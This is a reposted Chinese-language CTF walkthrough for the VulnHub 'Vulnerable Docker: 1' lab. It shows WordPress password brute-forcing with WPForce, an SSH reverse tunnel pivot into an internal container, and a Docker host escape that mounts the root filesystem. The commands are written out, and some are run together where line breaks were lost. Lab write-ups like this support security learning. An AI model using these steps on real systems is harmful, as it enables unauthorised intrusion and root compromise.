VulnHub-Vulnerable Docker: 1

admin 2024年7月4日14:30:19评论24 views字数 2344阅读7分48秒阅读模式
 

VulnHub-Vulnerable Docker: 1

靶机地址:https://www.vulnhub.com/entry/vulnerable-docker-1,208/

靶机难度:中级(CTF)

靶机发布日期:2017年9月27日

靶机描述:

是否曾经幻想过在容器中使用docker配置错误,权限提升等问题?

下载此虚拟机,拔出笔尖的帽子并开始使用

我们有2种模式:-HARD:这将需要您结合使用docker技能和笔测试技能来实现主机妥协。-轻松:相对简单的路径,知道docker就足以破坏计算机并在主机上获得根。

我们已在可供您使用的各种机器/系统中植入了3个标记文件。如果您选择接受,则您的任务如下:

标识所有标志(总共2个:flag_1和flag_3)(flag_2被无意中遗漏了)

在主机上获得id = 0 shell访问。

目标:得到root权限&找到flag.txt

请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

VulnHub-Vulnerable Docker: 1

 

 

一、信息收集

 

VulnHub-Vulnerable Docker: 1

可以看到靶机开机已经显示了IP:

192.168.56.135

VulnHub-Vulnerable Docker: 1

nmap扫到了22和8000端口都打开了...可以看到这又是wordpress CMS

直接访问http8000..

VulnHub-Vulnerable Docker: 1

直接上wpscan...

VulnHub-Vulnerable Docker: 1

这边有挺多信息,有bob用户,存在robot.txt文件,都查看下吧...

VulnHub-Vulnerable Docker: 1

http://192.168.232.134:8000/wp-admin/

是登录入口...另外一个没啥用...

这边不用rockyou.txt爆破网站,太浪费时间了...几百万个单词...

这边用WPForce爆破...

[链接](https://github.com/n00py/WPForce)

VulnHub-Vulnerable Docker: 1

VulnHub-Vulnerable Docker: 1

python wpforce.py -i dayu.txt -w /root/Desktop/dayu/10_million_password_list_top_10000.txt -u http://192.168.56.135:8000

命令直接进行爆破,结果:Welcome1 (不懂得可以去查看下链接)

这边还使用bp进行爆破也行,这边填写好代理后,填入bob账号,劫持...

VulnHub-Vulnerable Docker: 1

VulnHub-Vulnerable Docker: 1

然后发到intruder,放入字典即可爆破,这边我就不多解释了,知道结果即可...

VulnHub-Vulnerable Docker: 1

成功登录...

 

 

二、提权

 

 

VulnHub-Vulnerable Docker: 1

找到flag1:

VulnHub-Vulnerable Docker: 1

进来后就很熟悉了,直接提权吧...

VulnHub-Vulnerable Docker: 1

成功拿到低权后...

VulnHub-Vulnerable Docker: 1

不能sudo...

VulnHub-Vulnerable Docker: 1

这边发现本地网络有点问题...存在172.18.0.1~4都能ping通...查看下Docker基础架构看看...

应该是存在remote API未授权访问漏洞利用...

这里本来可以用:

[reGeorg](https://github.com/sensepost/reGeorg)

处理的,但是我不会...很尴尬...我这边用别的方法整代理.

VulnHub-Vulnerable Docker: 1

我这里写了个sh...

#!/bin/bashhosts=("172.18.0.1""172.18.0.2""172.18.0.3""172.18.0.4")END=65535

.......自己琢磨吧...

VulnHub-Vulnerable Docker: 1

开启本地服务...

VulnHub-Vulnerable Docker: 1

执行,发现了8022端口...在.3上...

VulnHub-Vulnerable Docker: 1

查看172.18.0.3:8022的URL发现可以ssh登录...

VulnHub-Vulnerable Docker: 1

openssh.deb是这个文件:http://http.us.debian.org/debian/pool/main/o/openssh/openssh-client_6.7p1-5+deb8u4_amd64.deb

VulnHub-Vulnerable Docker: 1

dpkg -x openssh.deb .; cd usr/bin; chmod +x ssh*; ./ssh-keygen -P '' -f id_rsa -t rsa; cat id_rsa.pub

用于登陆ssh...

VulnHub-Vulnerable Docker: 1

chmod 600 ~/.ssh/authorized_keysservice ssh restart

将密匙放入本地ssh目录中...然后开启ssh...

VulnHub-Vulnerable Docker: 1

./ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownhostsFile=/dev/null -v -i id_rsa -R 8022:172.18.0.3:8022 -fN root@192.168.182.149

VulnHub-Vulnerable Docker: 1

成功开启代理...

VulnHub-Vulnerable Docker: 1

本地访问8022即可登录...

VulnHub-Vulnerable Docker: 1

可以看到docker,可以利用remote API未授权访问...

这边需要用外网...我这边设置的是桥接的局域网环境,我这边得重新弄下改外网环境...

先更新源...然后下载curl...

VulnHub-Vulnerable Docker: 1

curl -fsSL get.docker.com -o get-docker.shsh get-docker.shdocker ps

安装了一个docker,可以看到安装成功了...

参考[链接](https://www.secpulse.com/archives/55928.html)

VulnHub-Vulnerable Docker: 1

docker run -it --rm -v /:/vol wordpress /bin/bash

使用volume挂载主机上的所有文件到一个目录...成功提权...查看到了flag3...

 

这台靶机可以学到Docker利用和remote API未授权访问分析和利用...非常好!!!

由于我们已经成功得到root权限和flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

VulnHub-Vulnerable Docker: 1

VulnHub-Vulnerable Docker: 1

原文始发于微信公众号(大余安全):VulnHub-Vulnerable Docker: 1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月4日14:30:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VulnHub-Vulnerable Docker: 1https://cn-sec.com/archives/892445.html

发表评论

匿名网友 填写信息